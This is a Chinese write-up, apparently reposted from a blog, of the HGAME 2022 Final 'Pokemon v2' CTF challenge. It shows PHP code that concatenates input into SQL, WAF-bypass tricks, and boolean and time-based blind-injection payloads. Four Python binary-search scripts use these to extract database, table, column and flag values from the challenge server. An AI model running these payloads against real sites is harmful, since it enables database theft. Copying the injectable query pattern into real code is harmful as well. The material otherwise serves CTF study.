当前位置:网站首页>HGAME 2022 Final Pokemon v2 writeup
HGAME 2022 Final Pokemon v2 writeup
2022-08-10 22:30:00 【ek1ng】
Hgame final Pokemon v2 writeup
题目概述
一道sql盲注的题目,无直接回显并且waf比较多,final的时候没做出来现在来补一补题
参考: http://dhycnhdu.com/index.php/archives/5/https://blog.51cto.com/u_15400016/4287240
如何绕过滤
题目是给出了源码,根据源码的waf我们先来说说如何绕过waf
<?php
$server = $_ENV['MYSQL_ADDR'];
$username = $_ENV['MYSQL_USER'];
$password = $_ENV['MYSQL_PASSWORD'];
$database = $_ENV['DATABASE'];
$db = new mysqli($server, $username, $password, $database);
if ($db->connect_error) {
die('鏁版嵁搴撻摼鎺ュけ璐ワ紒');
}
function waf($code) {
$blacklist = ['substr', 'mid', '=', 'like', '#', '\'', '"', '!','extract', 'update', '\^', '\$','union', '\bor\b', 'and', ' ', '\+', '-'];
foreach($blacklist as $b) {
if (preg_match('/'.$b.'/i', $code)) {
return true;
}
}
return false;
}
function getStatusMessage($code) {
global $db;
if (waf($code)) {
return -1;
}
$sql = 'SELECT code,msg FROM errors WHERE code='.$code;
return $db->query($sql);
}
sql语句中直接将code变量拼接进sql语句,导致sql注入的发生。
union的过滤导致不能使用联合查询,联合查询就是直接可以把查询结果带出来,这里只能用盲注,下面是对waf的过滤一些绕过的措施
substr -> right(left(xxx,1),1)
空格 -> /**/
= -> in() 或者 >
and -> %26%26
字符串过滤 -> 16进制编码
子查询需要外层加个括号
注入点的判断
首先是注入点,在这个error界面的code变量存在sql注入
字段数
使用order by对返回字段数量进行判断
/error.php?code=404/**/order/**/by/**/3
回显failed to query database
/error.php?code=404/**/order/**/by/**/2
回显pokemon not found
说明字段数为2
数据库长度
/error.php?code=404/**/%26%26/**/if(length(database())>7,sleep(1),1)
回显pokemon not found
/error.php?code=404/**/%26%26/**/if(length(database())>6,sleep(1),1)
回显为空
说明数据库长度为7
数据库名
原payload:/error.php?code=404 and ascii(substr(database(),1,1)>112
绕waf后如下
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>112
回显为空
/error.php?code=404/**/%26%26/**/ascii(right(left(database(),1),1))>111
回显pokemon not found
说明数据库字段第一个字符为p
然后我们需要写个python脚本,手动注入不是个事,写个python脚本用二分法注入比较快
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 8):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left(database(),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404说明表达式成立,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# 无回显说明表达式不成立,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到数据库名称pokemon
表名
原payload:?code=404 and (ascii(substr((select table_name from information_schema.tables where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404说明表达式成立,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# 无回显说明表达式不成立,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到表名errors,seeeeeeecret,不过爆数据列的时候我是用table_schema = ‘pokemon’的所以说这个表名没有用上,另外这个脚本有些问题,因为我没判断长度,所以说爆出来的长度不太确定,但是通常不会在末尾有重复字符
列名
原payload:?code=404 and (ascii(substr((select column_name from information_schema.columns where table_schema='pokemon' limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/in/**/(0x706f6b656d6f6e)/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404说明表达式成立,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# 无回显说明表达式不成立,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
得到列名id,code,msg,flag
值
原payload:?code=404 and (ascii(substr((select flag from seeeeeeecret limit 0,1),1,1)))>?
# -*- coding: utf-8 -*-
import requests
import re
findlink = re.compile(r'(.*) Pokemon (.*?) .*')
baseurl = "http://146.56.223.34:65432/error.php?code="
dbs = ""
for i in range(1, 100):
print('----------------------------------------------------')
min_value = 33
max_value = 130
mid = (min_value + max_value) // 2 # 中值
while (min_value < max_value):
code = f"404/**/%26%26/**/ascii(right(left((select/**/flag/**/from/**/seeeeeeecret/**/limit/**/0,1),{i}),1))>{mid}"
payload = baseurl + code
r = requests.get(payload)
# 回显404说明表达式成立,mid太小
if (len(re.findall(findlink, r.text)) != 0):
min_value = mid + 1
# 无回显说明表达式不成立,mid太大
else:
max_value = mid
mid = (min_value + max_value) // 2
dbs += chr(mid)
print(dbs)
hgame{96mz5v3c9hnj49t7xqj76et6xw4dpczy}
边栏推荐
- Qualcomm Platform Development Series Explanation (Application) Introduction to QCMAP Application Framework
- 交换机和生成树知识点
- Glide监听Activity生命周期源码分析
- Shell 编程--Sed
- GMT,UTC,CST,DST,RTC,NTP,SNTP,NITZ: 嵌入式的时间
- ThreadLocal comprehensive analysis (1)
- MySQL Advanced Commands
- Translating scientific and technological papers, how to translate from Russian to Chinese
- Redis
- port forwarding
猜你喜欢
QT笔记——用VS + qt 生成dll 和 调用生成的dll
配电网络扩展规划:考虑使用概率性能源生产和消费概况的决策(Matlab代码实现)
高通平台开发系列讲解(应用篇)QCMAP应用框架介绍
VLAN huawei 三种模式
面试官: AMS在Android起到什么作用,简单的分析下Android的源码
How many threads does LabVIEW allocate?
分享一个后台管理系统可拖拽式组件的设计思路
RK3399 platform development series explanation (kernel-driven peripherals) 6.35, IAM20680 gyroscope introduction
【软件测试】2022年最火的十大测试工具,你掌握了几个
EL表达式
随机推荐
GMT,UTC,CST,DST,RTC,NTP,SNTP,NITZ: 嵌入式的时间
B站数据分析岗实习生面试记录
留言有奖|OpenBMB x 清华大学NLP:大模型公开课更新完结!
Addition of linked lists (2)
水果沙拉酱
解码2022中国网安强星丨正向建、反向查,华为构建数字化时代的网络安全防线
艺术与科技的狂欢,阿那亚2022砂之盒沉浸艺术季
阿里云贾朝辉:云XR平台支持彼真科技呈现国风科幻虚拟演唱会
3598. Binary tree traversal (Huazhong University of Science and Technology exam questions)
过滤器
RecyclerView上下滑动时,不调用onBindViewHolder 导致列表的item不刷新
实例055:按位取反
美味的佳肴
实例049:lambda
ASCII, Unicode and UTF-8
OneNote tutorial, how to organize notebooks in OneNote?
MySQL学习笔记(2)——简单操作
【640. 求解方程】
web项目访问引用jar内部的静态资源
配电网络扩展规划:考虑使用概率性能源生产和消费概况的决策(Matlab代码实现)